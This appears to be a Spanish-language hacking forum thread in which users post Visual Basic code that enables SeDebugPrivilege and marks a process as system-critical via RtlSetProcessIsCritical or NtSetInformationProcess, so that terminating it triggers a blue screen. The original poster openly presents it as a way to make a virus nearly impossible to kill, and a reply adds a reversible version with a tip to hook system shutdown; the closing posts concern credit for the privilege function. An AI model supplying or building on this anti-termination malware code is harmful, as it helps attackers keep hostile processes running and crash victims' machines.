Autor
|
Tema: API RtlSetProcessIsCritical (Leído 7,154 veces)
|
XcryptOR
Desconectado
Mensajes: 228
|
Bueno este code hace uso de un API nativa de NTDLL.dll la cual setea nuestro proceso como un proceso critico del sistema al igual que winlogon o csrss, bueno el resultado de terminar nuestro proceso dara como resultado la BSOD (Blue Screen Of Death) de windows, espero les sea de utilidad, aplicandolo a nuestra especie viral haria que nuestro proceso no se pudiera terminar. casi interminable. Codigo del Form: '************************************************************************* '************************************************************************* ' Uso de RtlSetProcessIsCritical para setear nuestro proceso, como proceso ' critico del sistema: del mismo modo que csrss.exe o winlogon ' XcryptOR - Made In Colombia '************************************************************************** '************************************************************************* Private Sub Form_Load() On Error Resume Next ObtenerPrivilegios SE_DEBUG_NAME ' obtiene privilegios de Debugeo Call RtlSetProcessIsCritical(0, 0, 1) ' setea nuestro proceso como Proceso Critico End Sub
Codigo Modulo: Option Explicit Private Const ANYSIZE_ARRAY = 1 Private Const TOKEN_ADJUST_PRIVILEGES = &H20 Private Const TOKEN_QUERY = &H8 Private Const SE_PRIVILEGE_ENABLED = &H2 Private Type LUID LowPart As Long HighPart As Long End Type Private Type LUID_AND_ATTRIBUTES pLuid As LUID Attributes As Long End Type Private Type TOKEN_PRIVILEGES PrivilegeCount As Long Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES End Type Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long Private Declare Function GetCurrentProcess Lib "kernel32" () As Long Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege" Public Declare Function RtlSetProcessIsCritical Lib "ntdll.dll" (ByVal NewValue As Boolean, ByVal OldValue As Boolean, ByVal WinLogon As Boolean) Public Function ObtenerPrivilegios(ByVal privilegio As String) As Long Dim lpLUID As LUID Dim lpToken As TOKEN_PRIVILEGES Dim lpAntToken As TOKEN_PRIVILEGES Dim hToken As Long Dim hProcess As Long Dim res As Long hProcess = GetCurrentProcess() res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken) If res = 0 Then Exit Function End If res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID) If res = 0 Then Exit Function End If With lpToken .PrivilegeCount = 1 .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED .Privileges(0).pLuid = lpLUID End With res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken)) If res = 0 Then Exit Function End If ObtenerPrivilegios = res End Function
saludos
|
|
« Última modificación: 15 Noviembre 2008, 02:10 am por XcryptOR »
|
En línea
|
|
|
|
carlitrosss6
Desconectado
Mensajes: 18
You know you're right.
|
Funciona de maravilla,pero còmo se podrìa revertir esto?Es decir,quitarle el privilegio de "Critico" al proceso?
Saludos!
|
|
|
En línea
|
Arriba Mèxico!!
|
|
|
XcryptOR
Desconectado
Mensajes: 228
|
sabes esta api no es reversible, deberias probar este code que hizo SqUeEzEr, que es similar al mio, aqui te lo dejo, espero te sea de utilidad. Public Function MakeCritical(Phandle As Long, Value As Boolean)
si le asignas verdadero sera un proceso critico y para revertirlo llama a la funcion con el valor false. es un muy buen uso del API NtSetInformationProcess, puedes hacer un hook al cierre del sistema para hacer que tu proceso se vuelva No Critico al cierre de windows. saludos 'Native api NtSetInformationProcess by SqUeEzEr Option Explicit Private Const ANYSIZE_ARRAY = 1 Private Const TOKEN_ADJUST_PRIVILEGES = &H20 Private Const TOKEN_QUERY = &H8 Private Const SE_PRIVILEGE_ENABLED = &H2 Private Type LUID LowPart As Long HighPart As Long End Type Private Type LUID_AND_ATTRIBUTES pLuid As LUID Attributes As Long End Type Private Type TOKEN_PRIVILEGES PrivilegeCount As Long Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES End Type Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long Private Declare Function GetCurrentProcess Lib "kernel32" () As Long Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long Public Const SE_CREATE_TOKEN_NAME As String = "SeCreateTokenPrivilege" Public Const SE_ASSIGNPRIMARYTOKEN_NAME As String = "SeAssignPrimaryTokenPrivilege" Public Const SE_LOCK_MEMORY_NAME As String = "SeLockMemoryPrivilege" Public Const SE_INCREASE_QUOTA_NAME As String = "SeIncreaseQuotaPrivilege" Public Const SE_UNSOLICITED_INPUT_NAME As String = "SeUnsolicitedInputPrivilege" Public Const SE_MACHINE_ACCOUNT_NAME As String = "SeMachineAccountPrivilege" Public Const SE_TCB_NAME As String = "SeTcbPrivilege" Public Const SE_SECURITY_NAME As String = "SeSecurityPrivilege" Public Const SE_TAKE_OWNERSHIP_NAME As String = "SeTakeOwnershipPrivilege" Public Const SE_LOAD_DRIVER_NAME As String = "SeLoadDriverPrivilege" Public Const SE_SYSTEM_PROFILE_NAME As String = "SeSystemProfilePrivilege" Public Const SE_SYSTEMTIME_NAME As String = "SeSystemtimePrivilege" Public Const SE_PROF_SINGLE_PROCESS_NAME As String = "SeProfileSingleProcessPrivilege" Public Const SE_INC_BASE_PRIORITY_NAME As String = "SeIncreaseBasePriorityPrivilege" Public Const SE_CREATE_PAGEFILE_NAME As String = "SeCreatePagefilePrivilege" Public Const SE_CREATE_PERMANENT_NAME As String = "SeCreatePermanentPrivilege" Public Const SE_BACKUP_NAME As String = "SeBackupPrivilege" Public Const SE_RESTORE_NAME As String = "SeRestorePrivilege" Public Const SE_SHUTDOWN_NAME As String = "SeShutdownPrivilege" Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege" Public Const SE_AUDIT_NAME As String = "SeAuditPrivilege" Public Const SE_SYSTEM_ENVIRONMENT_NAME As String = "SeSystemEnvironmentPrivilege" Public Const SE_CHANGE_NOTIFY_NAME As String = "SeChangeNotifyPrivilege" Public Const SE_REMOTE_SHUTDOWN_NAME As String = "SeRemoteShutdownPrivilege" 'THE api we need! Private Declare Function NtSetInformationProcess Lib "ntdll.dll" (ByVal hProcess As Integer, ByVal ProcessInformationClass As Integer, ByVal ProcessInformation As Long, ByVal ProcessInformationLength As Integer) As Integer Private Const ProcessBreakOnTermination As Long = 29 'The api we need! Public Function MakeCritical(Phandle As Long, Value As Boolean) GetPrivilegs SE_DEBUG_NAME Dim ProcessInfo As Long If Value = True Then ProcessInfo = 29& Else ProcessInfo = 0& End If Call NtSetInformationProcess(Phandle, ProcessBreakOnTermination, VarPtr(ProcessInfo), Len(ProcessInfo)) End Function Public Function GetPrivilegs(ByVal privilegio As String) As Long Dim lpLUID As LUID Dim lpToken As TOKEN_PRIVILEGES Dim lpAntToken As TOKEN_PRIVILEGES Dim hToken As Long Dim hProcess As Long Dim res As Long hProcess = GetCurrentProcess() res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken) If res = 0 Then Exit Function End If res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID) If res = 0 Then Exit Function End If With lpToken .PrivilegeCount = 1 .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED .Privileges(0).pLuid = lpLUID End With res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken)) If res = 0 Then Exit Function End If GetPrivilegs = res End Function
|
|
« Última modificación: 6 Junio 2009, 04:14 am por XcryptOR »
|
En línea
|
|
|
|
carlitrosss6
Desconectado
Mensajes: 18
You know you're right.
|
Barbaro Gracias XcryptOR!!
|
|
|
En línea
|
Arriba Mèxico!!
|
|
|
Freeze.
|
Creo que la función ObtenerPrivilegios es de Karcrack... Si es asi deberia tener un reconocimiento...
|
|
|
En línea
|
|
|
|
Karcrack
Desconectado
Mensajes: 2.416
Se siente observado ¬¬'
|
Creo que la función ObtenerPrivilegios es de Karcrack... Si es asi deberia tener un reconocimiento... No, no es mia... si no recuerdo mal es de Nhaalclkiemr lastima que no haya vuelto a aparecer
|
|
|
En línea
|
|
|
|
Freeze.
|
Si, lastima.. Es una gran persona y un excelente programador. ¿No será que sigue viviendo por ahí a escondidas?
|
|
|
En línea
|
|
|
|
|
|